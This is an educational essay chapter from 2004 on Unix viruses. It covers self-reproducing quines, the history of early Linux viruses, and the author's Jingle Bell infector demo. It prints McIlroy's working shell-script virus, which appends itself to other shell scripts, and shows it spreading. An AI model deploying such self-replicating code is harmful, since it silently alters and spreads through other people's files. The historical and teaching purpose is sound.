kernelthread.com

A Taste of Computer Security

© Amit Singh. All Rights Reserved. Written in June 2004


Viruses on Unix

Unix has the reputation of being "not so buggy", and of being a good maintainer of system sanctity via good protection mechanisms (in particular, a supervisor mode that is supposed to be very hard to attain for a non-super-user).

Feasibility

You do not need to exploit bugs in an operating system to have viruses. Essentially all operating systems provide prerequisites for supporting a computer virus. Similarly, supervisor mode is not necessary for viral activity, and in any case, supervisor mode may be obtained through virus-unrelated security holes. Moreover, the number of reported viruses on a particular platform is not an indicator of the feasibility (either way) of viruses on that platform.

A typical definition of a computer virus might have aspects such as the following:

Note that none of the above is automatically ruled out on Unix.

Self-Reproduction

A common buzz-phrase heard in the context of computer viruses is that they are self-reproducing. Ken Thompson presents a delightful discussion on software self-reproduction in Reflections on Trusting Trust. Thompson says that: "In college ... One of the favorites [programming exercises] was to write the shortest self-reproducing program [in FORTRAN]".

Now, if self-reproduction is looked upon as purely a programming exercise, the ease of writing such code would be related to the syntax of the programming language being used. Consider the following C one-liner (source) that prints itself (broken into multiple lines to fit):

main(){char*p="main(){char*p=%c%s%c; (void)printf(p,34,p,34,10);}%c"; (void)printf(p,34,p,34,10);} ... % gcc -o pself pself.c % ./pself | diff /dev/stdin ./pself.c %

Along similar lines, here is one in Perl (source):

$s='$s=%c%s%c;printf($s,39,$s,39);';printf($s,39,$s,39); ... % perl pself.pl | diff /dev/stdin ./pself.pl %

The following is a self-reproducing shell-script (source):

E='E=%s;printf "$E" "\x27$E\x27"';printf "$E" "'$E'" ... % /bin/sh pself.sh | diff /dev/stdin ./pself.sh %

Finally, here is C a program that reproduces itself backwards (source):

main(){int i;char *k;char a[]="main(){int i;char *k; char a[]=%c%s%c;k=(char *)malloc(220);for(i=0;i<219;i++) {k[i]=a[218-i];}*(k+219)=0;strcpy(a,k);a[183]=k[184];a[184] =k[183];a[185]=k[184];a[186]=k[185];a[187]=k[184];a[188]=k[ 187];printf(a,34,k,34);}";k=(char*)malloc(220);for(i=0 ;i<219;i++){k[i]=a[218-i];}*(k+219)=0;strcpy(a,k);a[183] =k[184];a[184]=k[183];a[185]=k[184];a[186]=k[185];a[187]=k[ 184];a[188]=k[187];printf(a,34,k,34);} ... % gcc -o reflect reflect.c % ./reflect | perl -e '$r = reverse(<STDIN>); print $r;'\ | diff /dev/stdin ./reflect.c %

The point is that it is practical to write self-reproducing code in high-level languages. In particular, such programs could be made to carry arbitrary baggage, such as viral code. However, note that real-life viruses usually do not reproduce themselves syntactically.

First *nix Virus?

"McAfee detects first Linux Virus."
— IT headlines, February 7, 1997

Headlines screamed "Linux virus" on February 7, 1997, as it was "proved" that a virus for Linux could be written. The virus source was posted on several sites, after the compressed tar file had been byte swapped, uuencoded and rot13'ed, apparently so that curious novices could not inadvertently use it. The virus was blissfully called Bliss. "Vaccines" appeared promptly from various sources on the Internet, including an all too happy McAfee.

Note that there was an earlier "virus" for Linux, called Staog, that used buffer overflow vulnerabilities in mount and tip, and a bug in suidperl, to try to gain root access.

In any case, Unix viruses are not that new, and they were not invented in 1997. We saw earlier that Cohen created some experimental Unix viruses. Here is a note from Dennis Ritchie on Unix viruses:

"A few years ago Tom Duff created a very persistent UNIX virus. At that point we had about 10-12 8th or 9th edition VAX 750s networked together. The virus lived in the slack space at the end of the executable, and changed the entry point to itself. When the program was executed, it searched the current directory, subdirectories, /bin, /usr/bin for writable, uninfected files and then infected them if there was enough space."

The Crux Of The Matter

It should not be any harder to write a virus for Unix than it would be for any other system. However, deploying, or spreading a virus would have different logistics on Unix (and is harder) as compared to Windows. We discuss some relevant differences between Unix and Windows in a later section.

How to hide?

There are several candidates on Unix for being a virus's runtime environment. Similarly, there are several places for a virus to hide on Unix.

The Unix Shells

Shell scripts are a powerful way to program. Unix shells are ubiquitous, accessible, and provide homogeneity across otherwise heterogeneous systems (for example, with differing application binary interfaces). Shell scripts are simply text files, and lend themselves easily to be modified.

M. Douglas McIlroy developed a simple shell-script virus, a 150-byte version of which he called Traductor simplicimus. The code for McIlroy's virus is reproduced below:

for i in * #virus# do case "`sed 1q $i`" in "#!/bin/sh") grep '#virus#' $i >/dev/null || sed -n '/#virus#/,$p' $0 >>$i esac done 2>/dev/null

Now, given that we have a shell-script, infected.sh, infected with this virus, consider an example of the infection spreading:

% ls infected.sh hello.sh % cat hello.sh #!/bin/sh echo "Hello, World!" % ./infected.sh /* whatever output it is supposed to product */ % cat hello.sh #!/bin/sh echo "Hello, World!" for i in * #virus# do case "`sed 1q $i`" in "#!/bin/sh") grep '#virus#' $i >/dev/null || sed -n '/#virus#/,$p' $0 >>$i esac done 2>/dev/null

McIlroy called viruses "a corollary of universality." He concluded viruses to be a natural consequence of stored-program computing, and pointed out that "no general defense [against viruses] within one domain of reference is possible ..."

Jim Reeds called /bin/sh "the biggest UNIX security loophole."

Binary Executables

A virus writer may want his virus to hide in a binary executable, for obvious reasons (such files provide more obscure hiding places, and are often more "active"). However, given the diverse nature of different Unix platforms (including different executable formats), modifying an executable might be rather painful to implement. For example, the feasibility and difficulty of injecting a stream of instructions into an executable to modify program execution would depend on the file format.

Instruction injection is not limited to virus creation. It has several legitimate uses. Code profilers could need to insert profiling code in-place. The New Jersey Machine-Code Toolkit offers help in this regard.

The Executable and Linking Format (ELF) is meant to provide developers with a set of binary interface definitions that extend across multiple platforms. ELF is indeed used on several platforms, and is flexible enough to be manipulated creatively, as demonstrated by many. A virus could attach viral code to an ELF file, and re-route control-flow so as to include the viral code during execution.

Jingle Bell: A Simple Virus In C

Jingle Bell (source) is an extremely simple minded virus written in C that attaches itself to an executable by appending the latter to itself and recording the offset. This process repeats itself.

I wrote this "virus" several years ago when I used to work at Bell Laboratories. Hence, the name. The last I heard, it is also available as a user-contributed port in the Plan 9 operating system.

The virus infects the first executable found, if any, on its command line. Other infection policies could be programmed too. The virus would somehow need to be introduced in the system, through a downloaded binary, for example. Assuming that /bin/ls is infected, an infection session is shown below:

# ls -las total 15 1 drwxr-xr-x 2 root root 1024 Jan 19 13:33 . 1 drwxr-xr-x 4 root root 1024 Jan 19 13:32 .. 1 -rw-r--r-- 1 root root 75 Jan 19 13:33 hello.c # cat hello.c #include <stdio.h> int main() { printf("Hello, World!\n"); exit(0); } # cc hello.c # ls -las total 15 1 drwxr-xr-x 2 root root 1024 Jan 19 13:36 . 1 drwxr-xr-x 4 root root 1024 Jan 19 13:34 .. 12 -rwxr-xr-x 1 root root 11803 Jan 19 13:36 a.out 1 -rw-r--r-- 1 root root 75 Jan 19 13:33 hello.c # ./a.out Hello, World # ls -las a.out # This will infect a.out 29 -rwxr-xr-x 1 root root 28322 Jan 19 13:38 a.out # ./a.out # a.out works as before Hello, World # cc hello.c -o hello # compile hello.c again # ls -las # a.out infected, hello not yet infected total 44 1 drwxr-xr-x 2 root root 1024 Jan 19 13:40 . 1 drwxr-xr-x 4 root root 1024 Jan 19 13:34 .. 29 -rwxr-xr-x 1 root root 28322 Jan 19 13:38 a.out 12 -rwxr-xr-x 1 root root 11803 Jan 19 13:40 hello 1 -rw-r--r-- 1 root root 75 Jan 19 13:33 hello.c # ./a.out hello # This should infect hello Hello, World! # ls -las # It indeed does total 61 1 drwxr-xr-x 2 root root 1024 Jan 19 13:40 . 1 drwxr-xr-x 4 root root 1024 Jan 19 13:34 .. 29 -rwxr-xr-x 1 root root 28322 Jan 19 13:38 a.out 29 -rwxr-xr-x 1 root root 28322 Jan 19 13:40 hello 1 -rw-r--r-- 1 root root 75 Jan 19 13:33 hello.c

The infection works quite typically. It must be noted that the infected program can cause further infection in its domain only.

How to spread?

As stated earlier, it is one thing to write a virus, it is another to deploy it: seed the infection, and have it spread. A channel (or a mechanism) used by virus to spread is called a vector. There is no dearth of potential vectors on Unix (for example, buffer overflow vulnerabilities).

Now, A legitimate and often asked question is that if it is perfectly feasible to create viruses for Unix systems, and if potential vectors exist, then why are Unix systems (apparently) virus-free — at least relative to Windows?

This question would be rather easy to deal with if the answer were entirely technical in nature. It is not. An attempt to answer this question would involve looking at numerous intertwined issues: real and imaginary, technical and (mostly) non-technical — historical, circumstantial, social, political, and so on. We look at some of these issues in the final section.

<<< Digital Life: Viruses main Platform-Independent Malware >>>